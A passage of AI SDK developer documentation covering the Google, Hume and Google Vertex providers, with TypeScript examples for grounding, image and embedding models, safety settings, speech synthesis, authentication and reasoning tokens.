prompt:
'What are the best Italian restaurants within a 15-minute walk from here?',
});
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context, including Google Maps and Google Search.
When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:
{
"groundingMetadata": {
"groundingChunks": [
{
"maps": {
"uri": "https://maps.google.com/?cid=12345",
"title": "Restaurant Name",
"placeId": "places/ChIJ..."
}
}
]
}
}
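You can pull the place details out of these maps chunks, for example to render links to the recommended places (a sketch based on the chunk shape shown above):
// Sketch: list the Google Maps places referenced in the response.
for (const chunk of groundingMetadata?.groundingChunks ?? []) {
  if (chunk.maps) {
    console.log(`${chunk.maps.title}: ${chunk.maps.uri} (${chunk.maps.placeId})`);
  }
}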
Google Maps grounding is supported on Gemini 2.0 and newer models.
RAG Engine Grounding
With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.
import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const vertex = createVertex({
project: 'my-project',
location: 'us-central1',
});
const { text, sources, providerMetadata } = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
vertex_rag_store: vertex.tools.vertexRagStore({
ragCorpus:
'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
topK: 5,
}),
},
prompt:
'What are the key features of our product according to our documentation?',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.
Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:
- `groundingChunks` (Array of chunk objects | null) - Contains the retrieved context chunks from your RAG corpus
  - Each chunk includes:
    - `retrievedContext`: Information about the retrieved context
      - `uri`: The URI or identifier of the source document
      - `title`: The title of the source document (optional)
      - `text`: The actual text content of the chunk
- `groundingSupports` (Array of support objects | null) - Contains details about how specific response parts are supported by RAG results
  - Each support object includes:
    - `segment`: Information about the grounded text segment
      - `text`: The actual text segment
      - `startIndex`: Starting position in the response
      - `endIndex`: Ending position in the response
    - `groundingChunkIndices`: References to supporting RAG result chunks
    - `confidenceScores`: Confidence scores (0-1) for each supporting chunk
Example response:
{
"groundingMetadata": {
"groundingChunks": [
{
"retrievedContext": {
"uri": "gs://my-bucket/docs/product-guide.pdf",
"title": "Product User Guide",
"text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 45,
"text": "Our product includes advanced AI capabilities and real-time processing."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.95]
}
]
}
}
Configuration Options
The vertexRagStore tool accepts the following configuration options:
- `ragCorpus` (string, required) - The RagCorpus resource name in the format `projects/{project}/locations/{location}/ragCorpora/{rag_corpus}`. This identifies your specific RAG corpus to search against.
- `topK` (number, optional) - The number of top contexts to retrieve from your RAG corpus. Defaults to the corpus configuration if not specified.
Image Outputs
Gemini models with image generation capabilities (e.g. gemini-2.5-flash-image) support generating images as part of a multimodal response. Images are exposed as files in the response.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash-image'),
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
console.log('Generated image:', file);
}
}
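To persist the generated images, write the file bytes to disk. A sketch assuming the standard AI SDK generated-file shape (uint8Array and mediaType):
import fs from 'node:fs';
// Sketch: save each generated image next to the script.
result.files.forEach((file, index) => {
  if (file.mediaType.startsWith('image/')) {
    const extension = file.mediaType.split('/')[1];
    fs.writeFileSync(`image-${index}.${extension}`, file.uint8Array);
  }
});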
Safety Ratings
The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.
Example response excerpt:
{
"safetyRatings": [
{
"category": "HARM_CATEGORY_HATE_SPEECH",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11027937,
"severity": "HARM_SEVERITY_LOW",
"severityScore": 0.28487435
},
{
"category": "HARM_CATEGORY_DANGEROUS_CONTENT",
"probability": "HIGH",
"blocked": true,
"probabilityScore": 0.95422274,
"severity": "HARM_SEVERITY_MEDIUM",
"severityScore": 0.43398145
},
{
"category": "HARM_CATEGORY_HARASSMENT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.11085559,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.19027223
},
{
"category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
"probability": "NEGLIGIBLE",
"probabilityScore": 0.22901751,
"severity": "HARM_SEVERITY_NEGLIGIBLE",
"severityScore": 0.09089675
}
]
}
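Since a response can be blocked when a category crosses the configured threshold, it can be useful to check the ratings programmatically. A minimal sketch using the safetyRatings variable from the grounding examples above:
// Sketch: detect categories that caused the response to be blocked.
const blockedCategories = (safetyRatings ?? []).filter(rating => rating.blocked);
if (blockedCategories.length > 0) {
  console.warn(
    'Blocked categories:',
    blockedCategories.map(rating => rating.category),
  );
}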
Troubleshooting
Schema Limitations
The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:
GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified
By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const { output } = await generateText({
model: google('gemini-2.5-flash'),
providerOptions: {
google: {
structuredOutputs: false,
} satisfies GoogleLanguageModelOptions,
},
output: Output.object({
schema: z.object({
name: z.string(),
age: z.number(),
contact: z.union([
z.object({
type: z.literal('email'),
value: z.string(),
}),
z.object({
type: z.literal('phone'),
value: z.string(),
}),
]),
}),
}),
prompt: 'Generate an example person for testing.',
});
The following Zod features are known not to work with Google:
- `z.union`
- `z.record`
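If you want to keep structured outputs enabled instead, one workaround is to avoid z.union entirely, for example by flattening the discriminated union into an enum plus a shared value field (a sketch of one possible schema shape, not the only option):
import { z } from 'zod';
// Sketch: a union-free schema that Google's structured outputs can handle.
const personSchema = z.object({
  name: z.string(),
  age: z.number(),
  contact: z.object({
    type: z.enum(['email', 'phone']),
    value: z.string(),
  }),
});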
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming | Google Search | URL Context |
|---|---|---|---|---|---|---|
| gemini-3.1-pro-preview | | | | | | |
| gemini-3.1-flash-image-preview | | | | | | |
| gemini-3.1-flash-lite-preview | | | | | | |
| gemini-3-pro-preview | | | | | | |
| gemini-3-pro-image-preview | | | | | | |
| gemini-3-flash-preview | | | | | | |
| gemini-2.5-pro | | | | | | |
| gemini-2.5-flash | | | | | | |
| gemini-2.5-flash-lite | | | | | | |
| gemini-2.5-flash-lite-preview-06-17 | | | | | | |
| gemini-2.0-flash | | | | | | |
Gemma Models
You can use Gemma models with the Google Generative AI API. The following Gemma models are available:
- `gemma-3-27b-it`
- `gemma-3-12b-it`
Gemma models don't natively support the systemInstruction parameter, but the provider automatically handles system instructions by prepending them to the first user message. This allows you to use system instructions with Gemma models seamlessly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemma-3-27b-it'),
system: 'You are a helpful assistant that responds concisely.',
prompt: 'What is machine learning?',
});
The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.
Embedding Models
You can create models that call the Google Generative AI embeddings API
using the .embedding() factory method.
const model = google.embedding('gemini-embedding-001');
The Google provider sends API calls to the right endpoint based on the type of embedding:
- Single embeddings: When embedding a single value with `embed()`, the provider uses the single `:embedContent` endpoint, which typically has higher rate limits compared to the batch endpoint.
- Batch embeddings: When embedding multiple values with `embedMany()` or multiple values in `embed()`, the provider uses the `:batchEmbedContents` endpoint.
Google embedding models support additional settings. You can pass them as an options argument:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embed } from 'ai';
const model = google.embedding('gemini-embedding-001');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
google: {
outputDimensionality: 512, // optional, number of dimensions for the embedding
taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (a single entry here, since `value` is a single value)
} satisfies GoogleEmbeddingModelOptions,
},
});
When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:
import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
model: google.embedding('gemini-embedding-2-preview'),
values: ['sunny day at the beach', 'rainy afternoon in the city'],
providerOptions: {
google: {
// content array must have the same length as values
content: [
[{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
null, // text-only, pairs with values[1]
],
} satisfies GoogleEmbeddingModelOptions,
},
});
The following optional provider options are available for Google embedding models:
- `outputDimensionality`: number
  Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
- `taskType`: string
  Optional. Specifies the task type for generating embeddings. Supported task types include:
  - `SEMANTIC_SIMILARITY`: Optimized for text similarity.
  - `CLASSIFICATION`: Optimized for text classification.
  - `CLUSTERING`: Optimized for clustering texts based on similarity.
  - `RETRIEVAL_DOCUMENT`: Optimized for document retrieval.
  - `RETRIEVAL_QUERY`: Optimized for query-based retrieval.
  - `QUESTION_ANSWERING`: Optimized for answering questions.
  - `FACT_VERIFICATION`: Optimized for verifying factual information.
  - `CODE_RETRIEVAL_QUERY`: Optimized for retrieving code blocks based on natural language queries.
- `content`: array
  Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index; its parts are merged with the text value in the request. Use `null` for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either `{ text: string }` or `{ inlineData: { mimeType: string, data: string } }`. Supported by `gemini-embedding-2-preview`.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions | Multimodal |
|---|---|---|---|
| gemini-embedding-001 | 3072 | | |
| gemini-embedding-2-preview | 3072 | | |
Image Models
You can create image models that call the Google Generative AI API using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
The Google provider supports two types of image models:
- Imagen models: Dedicated image generation models using the
:predictAPI - Gemini image models: Multimodal language models with image output capabilities using the
:generateContentAPI
Imagen Models
Imagen models are dedicated image generation models.
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Further configuration can be done using Google provider options. You can validate the provider options using the GoogleImageModelOptions type.
import { google } from '@ai-sdk/google';
import { GoogleImageModelOptions } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('imagen-4.0-generate-001'),
providerOptions: {
google: {
personGeneration: 'dont_allow',
} satisfies GoogleImageModelOptions,
},
// ...
});
The following provider options are available for Imagen models:
- `personGeneration` `allow_adult` | `allow_all` | `dont_allow`
  Whether to allow person generation. Defaults to `allow_adult`.
Imagen Model Capabilities
| Model | Aspect Ratios |
|---|---|
| imagen-4.0-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-ultra-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
| imagen-4.0-fast-generate-001 | 1:1, 3:4, 4:3, 9:16, 16:9 |
Gemini Image Models
Gemini image models (e.g. gemini-2.5-flash-image) are technically multimodal output language models, but they can be used with the generateImage() function for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: 'A photorealistic image of a cat wearing a wizard hat',
aspectRatio: '1:1',
});
Gemini image models also support image editing by providing input images:
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
import fs from 'node:fs';
const sourceImage = fs.readFileSync('./cat.png');
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: [sourceImage],
},
});
You can also use URLs for input images:
import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: google.image('gemini-2.5-flash-image'),
prompt: {
text: 'Add a small wizard hat to this cat',
images: ['https://example.com/cat.png'],
},
});
Gemini Image Model Capabilities
| Model | Image Generation | Image Editing | Aspect Ratios |
|---|---|---|---|
| gemini-2.5-flash-image | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3-pro-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
| gemini-3.1-flash-image-preview | | | 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9 |
title: Hume
description: Learn how to use the Hume provider for the AI SDK.
Hume Provider
The Hume provider contains support for the Hume text-to-speech (TTS) API.
Setup
The Hume provider is available in the @ai-sdk/hume module. You can install it with
pnpm add @ai-sdk/hume
Provider Instance
You can import the default provider instance hume from @ai-sdk/hume:
import { hume } from '@ai-sdk/hume';
If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:
import { createHume } from '@ai-sdk/hume';
const hume = createHume({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Hume provider instance:
- `apiKey` string
  API key that is being sent using the `X-Hume-Api-Key` header. It defaults to the `HUME_API_KEY` environment variable.
- `headers` Record<string,string>
  Custom headers to include in the requests.
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the Hume speech API
using the .speech() factory method.
const model = hume.speech();
You can pass standard speech generation options like voice, speed, instructions, and outputFormat:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
speed: 1.0,
instructions: 'Speak in a friendly, conversational tone.',
outputFormat: 'mp3',
});
Supported Parameters
- `text` string (required)
  The text to convert to speech.
- `voice` string
  The voice ID to use for the generated audio. Defaults to `'d8ab67c6-953d-4bd8-9370-8fa53a0f1453'`.
- `speed` number
  Speech rate multiplier.
- `instructions` string
  Description or instructions for how the text should be spoken.
- `outputFormat` string
  The audio format to generate. Supported values: `'mp3'`, `'pcm'`, `'wav'`. Defaults to `'mp3'`.
Provider Options
You can pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
import { type HumeSpeechModelOptions } from '@ai-sdk/hume';
const result = await generateSpeech({
model: hume.speech(),
text: 'Hello, world!',
providerOptions: {
hume: {
context: {
generationId: 'previous-generation-id',
},
} satisfies HumeSpeechModelOptions,
},
});
The following provider options are available:
- `context` object
  Context for the speech synthesis request. Can be either:
  - `{ generationId: string }` - ID of a previously generated speech synthesis to use as context.
  - `{ utterances: Utterance[] }` - An array of utterance objects for context, where each utterance has:
    - `text` string (required) - The text content.
    - `description` string - Instructions for how the text should be spoken.
    - `speed` number - Speech rate multiplier.
    - `trailingSilence` number - Duration of silence to add after the utterance in seconds.
    - `voice` object - Voice configuration, either `{ id: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' }` or `{ name: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' }`.
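For example, you can pass prior utterances as context so that new audio matches the voice and delivery of earlier generations (a sketch using the option shape described above):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume, type HumeSpeechModelOptions } from '@ai-sdk/hume';
// Sketch: provide utterance context for consistent delivery across requests.
const result = await generateSpeech({
  model: hume.speech(),
  text: 'And that is how the story ends.',
  providerOptions: {
    hume: {
      context: {
        utterances: [
          {
            text: 'Once upon a time, in a quiet village...',
            description: 'Calm, narrative storytelling tone.',
          },
        ],
      },
    } satisfies HumeSpeechModelOptions,
  },
});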
Model Capabilities
| Model | Instructions | Speed | Output Formats |
|---|---|---|---|
| default | | | mp3, pcm, wav |
title: Google Vertex AI
description: Learn how to use the Google Vertex AI provider.
Google Vertex Provider
The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models, Anthropic's Claude partner models, and MaaS (Model as a Service) open models.
Setup
The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with
pnpm add @ai-sdk/google-vertex
Google Vertex Provider Usage
The Google Vertex provider instance is used to create model instances that call the Vertex AI API. The models available with this provider include Google's Gemini models. If you're looking to use Anthropic's Claude models, see the Google Vertex Anthropic Provider section below.
Provider Instance
You can import the default provider instance vertex from @ai-sdk/google-vertex:
import { vertex } from '@ai-sdk/google-vertex';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
Google Vertex supports multiple authentication methods depending on your runtime environment and requirements.
Node.js Runtime
The Node.js runtime is the default runtime supported by the AI SDK. It supports all standard Google Cloud authentication options through the google-auth-library. Typical use involves setting a path to a JSON credentials file in the `GOOGLE_APPLICATION_CREDENTIALS` environment variable. The credentials file can be obtained from the Google Cloud Console.
If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
googleAuthOptions: {
credentials: {
client_email: 'my-email',
private_key: 'my-private-key',
},
},
});
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` string
  The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` string
  The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleAuthOptions` object
  Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
  - `authClient` object - An `AuthClient` to use.
  - `keyFilename` string - Path to a .json, .pem, or .p12 key file.
  - `keyFile` string - Path to a .json, .pem, or .p12 key file.
  - `credentials` object - Object containing `client_email` and `private_key` properties, or the external account client options.
  - `clientOptions` object - Options object passed to the constructor of the client.
  - `scopes` string | string[] - Required scopes for the desired API request.
  - `projectId` string - Your project ID.
  - `universeDomain` string - The default service domain for a given Cloud universe.
- `headers` Resolvable<Record<string, string | undefined>>
  Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `baseURL` string
  Optional. Base URL for the Google Vertex API calls, e.g. to use proxy servers. By default, it is constructed using the location and project: `https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google`
Edge Runtime
Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.
The Edge runtime version of the Google Vertex provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a JSON credentials file from the Google Cloud Console.
You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:
import { vertex } from '@ai-sdk/google-vertex/edge';
If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:
import { createVertex } from '@ai-sdk/google-vertex/edge';
const vertex = createVertex({
project: 'my-project', // optional
location: 'us-central1', // optional
});
For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:
- `GOOGLE_CLIENT_EMAIL`
- `GOOGLE_PRIVATE_KEY`
- `GOOGLE_PRIVATE_KEY_ID` (optional)
These values can be obtained from a service account JSON file from the Google Cloud Console.
Optional Provider Settings
You can use the following optional settings to customize the provider instance:
- `project` string
  The Google Cloud project ID that you want to use for the API calls. It uses the `GOOGLE_VERTEX_PROJECT` environment variable by default.
- `location` string
  The Google Cloud location that you want to use for the API calls, e.g. `us-central1`. It uses the `GOOGLE_VERTEX_LOCATION` environment variable by default.
- `googleCredentials` object
  Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
  - `clientEmail` string - The client email from the service account JSON file. Defaults to the contents of the `GOOGLE_CLIENT_EMAIL` environment variable.
  - `privateKey` string - The private key from the service account JSON file. Defaults to the contents of the `GOOGLE_PRIVATE_KEY` environment variable.
  - `privateKeyId` string - The private key ID from the service account JSON file (optional). Defaults to the contents of the `GOOGLE_PRIVATE_KEY_ID` environment variable.
- `headers` Resolvable<Record<string, string | undefined>>
  Headers to include in the requests. Can be provided in multiple formats:
  - A record of header key-value pairs: `Record<string, string | undefined>`
  - A function that returns headers: `() => Record<string, string | undefined>`
  - An async function that returns headers: `async () => Record<string, string | undefined>`
  - A promise that resolves to headers: `Promise<Record<string, string | undefined>>`
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Express Mode
Express mode provides a simplified authentication method using an API key instead of OAuth or service account credentials. When using express mode, the project and location settings are not required.
import { createVertex } from '@ai-sdk/google-vertex';
const vertex = createVertex({
apiKey: process.env.GOOGLE_VERTEX_API_KEY,
});
Optional Provider Settings
- `apiKey` string
  The API key for Google Vertex AI. When provided, the provider uses express mode with API key authentication instead of OAuth. It uses the `GOOGLE_VERTEX_API_KEY` environment variable by default.
Language Models
You can create models that call the Vertex API using the provider instance.
The first argument is the model id, e.g. gemini-2.5-pro.
const model = vertex('gemini-2.5-pro');
Google Vertex models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = vertex('gemini-2.5-pro');
await generateText({
model,
providerOptions: {
vertex: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
} satisfies GoogleLanguageModelOptions,
},
});
The following optional provider options are available for Google Vertex models:
- `cachedContent` string
  Optional. The name of the cached content used as context to serve the prediction. Format: `projects/{project}/locations/{location}/cachedContents/{cachedContent}`
- `structuredOutputs` boolean
  Optional. Enable structured output. Default is true.
  This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.
  See Troubleshooting: Schema Limitations for more details.
- `safetySettings` Array<{ category: string; threshold: string }>
  Optional. Safety settings for the model.
  - `category` string
    The category of the safety setting. Can be one of the following:
    - `HARM_CATEGORY_UNSPECIFIED`
    - `HARM_CATEGORY_HATE_SPEECH`
    - `HARM_CATEGORY_DANGEROUS_CONTENT`
    - `HARM_CATEGORY_HARASSMENT`
    - `HARM_CATEGORY_SEXUALLY_EXPLICIT`
    - `HARM_CATEGORY_CIVIC_INTEGRITY`
  - `threshold` string
    The threshold of the safety setting. Can be one of the following:
    - `HARM_BLOCK_THRESHOLD_UNSPECIFIED`
    - `BLOCK_LOW_AND_ABOVE`
    - `BLOCK_MEDIUM_AND_ABOVE`
    - `BLOCK_ONLY_HIGH`
    - `BLOCK_NONE`
- `audioTimestamp` boolean
  Optional. Enables timestamp understanding for audio files. Defaults to false.
  This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.
- `labels` object
  Optional. Defines labels used in billing reports. Consult Google's Documentation for usage details.
- `streamFunctionCallArguments` boolean
  Optional. When set to true, function call arguments will be streamed incrementally in streaming responses. This enables `tool-input-delta` events to arrive as the model generates function call arguments, reducing perceived latency for tool calls. Defaults to `false`. Only supported on the Vertex AI API (not the Gemini API) with Gemini 3+ models. Consult Google's Documentation for details.
You can use Google Vertex language models to generate text with the generateText function:
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const { text } = await generateText({
model: vertex('gemini-2.5-pro'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google Vertex language models can also be used in the streamText function
(see AI SDK Core).
Code Execution
With Code Execution, certain Gemini models on Vertex AI can generate and execute Python code. This allows the model to perform calculations, data manipulation, and other programmatic tasks to enhance its responses.
You can enable code execution by adding the code_execution tool to your request.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { code_execution: vertex.tools.codeExecution({}) },
prompt:
'Use Python to calculate the 20th Fibonacci number. Then find the nearest palindrome to it.',
});
The response will contain tool-call and tool-result parts for the executed code.
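You can inspect these parts on the result, for example to log the generated code and its output (a sketch; the exact shape of provider-executed tool results can vary):
// Sketch: log the code the model executed and what it returned.
for (const toolCall of result.toolCalls) {
  console.log('Code executed:', toolCall.input);
}
for (const toolResult of result.toolResults) {
  console.log('Execution result:', toolResult.output);
}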
URL Context
URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { url_context: vertex.tools.urlContext({}) },
prompt: 'What are the key points from https://example.com/article?',
});
Google Search
Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-pro'),
tools: { google_search: vertex.tools.googleSearch({}) },
prompt: 'What are the latest developments in AI?',
});
Enterprise Web Search
Enterprise Web Search provides grounding using a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and the public sector. Unlike standard Google Search grounding, Enterprise Web Search does not log customer data and supports VPC service controls. Supported models: Gemini 2.0 and newer.
import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
},
prompt: 'What are the latest FDA regulations for clinical trials?',
});
Google Maps
Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
google_maps: vertex.tools.googleMaps({}),
},
providerOptions: {
vertex: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
} satisfies GoogleLanguageModelOptions,
},
prompt: 'What are the best Italian restaurants nearby?',
});
The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.
Streaming Function Call Arguments
For Gemini 3 Pro and later models on Vertex AI, you can stream function call
arguments as they are generated by setting streamFunctionCallArguments to
true. This reduces perceived latency when functions need to be called, as
tool-input-delta events arrive incrementally instead of waiting for the
complete arguments. This option defaults to false.
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { streamText } from 'ai';
import { z } from 'zod';
const result = streamText({
model: vertex('gemini-3.1-pro-preview'),
prompt: 'What is the weather in Boston and San Francisco?',
tools: {
getWeather: {
description: 'Get the current weather in a given location',
inputSchema: z.object({
location: z.string().describe('City name'),
}),
},
},
providerOptions: {
vertex: {
streamFunctionCallArguments: true,
} satisfies GoogleLanguageModelOptions,
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'tool-input-start':
console.log(`Tool call started: ${part.toolName}`);
break;
case 'tool-input-delta':
process.stdout.write(part.delta);
break;
case 'tool-call':
console.log(`Tool call complete: ${part.toolName}`, part.input);
break;
}
}
Reasoning (Thinking Tokens)
Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.
To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. These options are passed through providerOptions.vertex:
import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText, streamText } from 'ai';
// For generateText:
const { text, reasoningText, reasoning } = await generateText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
vertex: {
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
} satisfies GoogleLanguageModelOptions,
},
prompt: 'Explain quantum computing in simple terms.',
});
console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);
// For streamText:
const result = streamText({
model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
providerOptions: {
vertex: {
thinkingConfig: {
includeThoughts: true,
// thinkingBudget: 2048, // Optional
},
